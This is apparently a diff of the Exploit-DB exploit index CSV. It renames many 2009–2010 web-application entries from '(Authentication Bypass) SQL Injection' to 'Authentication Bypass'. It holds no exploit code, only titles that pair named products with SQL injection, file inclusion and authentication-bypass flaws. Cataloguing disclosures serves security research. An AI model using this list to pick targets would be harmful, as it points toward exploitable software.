+9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0
 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - (codigo) SQL Injection",2009-07-24,s4r4d0,php,webapps,0
 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
@@ -21390,9 +21393,9 @@ id,file,description,date,author,platform,type,port
 9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
-9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
+9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0
 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
-9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
+9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0
 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion",2009-07-27,GoLd_M,php,webapps,0
 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0
 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' Parameter SQL Injection",2009-07-28,MizoZ,php,webapps,0
@@ -21419,26 +21422,26 @@ id,file,description,date,author,platform,type,port
 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0
 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass/File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0
 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0
-9328,platforms/asp/webapps/9328.txt,"AW BannerAd - (Authentication Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0
+9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0
 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0
-9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - (Authentication Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0
+9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0
 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0
 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0
-9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
-9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Authentication Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
+9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
+9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0
 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - Blind SQL Injection / Cross-Site Scripting",2009-08-03,Moudi,php,webapps,0
 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
-9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Authentication Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0
+9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps,0
 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0
 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0
 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0
-9348,platforms/php/webapps/9348.txt,"Blink Blog System - (Authentication Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
+9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0
 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0
 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0
 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0
-9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0
+9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0
 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0
 9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0
 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0
@@ -21453,18 +21456,18 @@ id,file,description,date,author,platform,type,port
 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0
 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0
-9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Authentication Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
+9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0
 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0
 9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0
 9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0
 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0
-9395,platforms/php/webapps/9395.txt,"PHPCityPortal - (Authentication Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0
+9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0
 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0
 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0
 9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0
-9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0
+9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps,0
 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
-9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
+9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps,0
 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0
 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0
@@ -21512,7 +21515,7 @@ id,file,description,date,author,platform,type,port
 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0
 9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0
 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0
-9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0
+9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0
 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0
 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0
 9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
@@ -21589,12 +21592,12 @@ id,file,description,date,author,platform,type,port
 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0
-9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0
+9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0
 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0
 9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0
 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0
 9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0
-9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0
+9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0
 9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
 9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0
@@ -21605,7 +21608,7 @@ id,file,description,date,author,platform,type,port
 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
 9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
-9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
+9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0
 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
 9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
@@ -21755,7 +21758,7 @@ id,file,description,date,author,platform,type,port
 10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
 10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
 10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
-10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0
+10222,platforms/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps,0
 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000
 10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0
@@ -21824,13 +21827,13 @@ id,file,description,date,author,platform,type,port
 10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0
 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
-10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0
+10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0
 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0
 10366,platforms/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
 10367,platforms/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0
 10369,platforms/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0
-10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)",2009-12-10,mr_me,php,webapps,0
+10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,php,webapps,0
 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0
 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80
 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0
@@ -21895,9 +21898,9 @@ id,file,description,date,author,platform,type,port
 10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0
 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0
 10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
-10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
+10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
 10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0
-10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0
+10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,asp,webapps,0
 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
 10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
@@ -21910,17 +21913,17 @@ id,file,description,date,author,platform,type,port 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps,0 10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0 10488,platforms/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 -10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 +10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0 -10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0 -10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 +10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - 
Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0 10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 @@ -21962,7 +21965,7 @@ id,file,description,date,author,platform,type,port 10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0 10564,platforms/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 -10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 +10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0 
@@ -22147,8 +22150,8 @@ id,file,description,date,author,platform,type,port 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0 +10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0 10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 
@@ -22163,7 +22166,7 @@ id,file,description,date,author,platform,type,port 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0 10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0 -10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0 
@@ -22179,10 +22182,10 @@ id,file,description,date,author,platform,type,port 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0 -10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass (SQL Injection)",2010-01-01,R3d-D3V!L,php,webapps,0 +10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps,0 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 -10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass (SQL Injection)",2010-01-02,R3d-D3V!L,php,webapps,0 +10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0 
@@ -22373,7 +22376,7 @@ id,file,description,date,author,platform,type,port 11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps,0 -11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Authentication Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 +11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0 11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0 11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0 
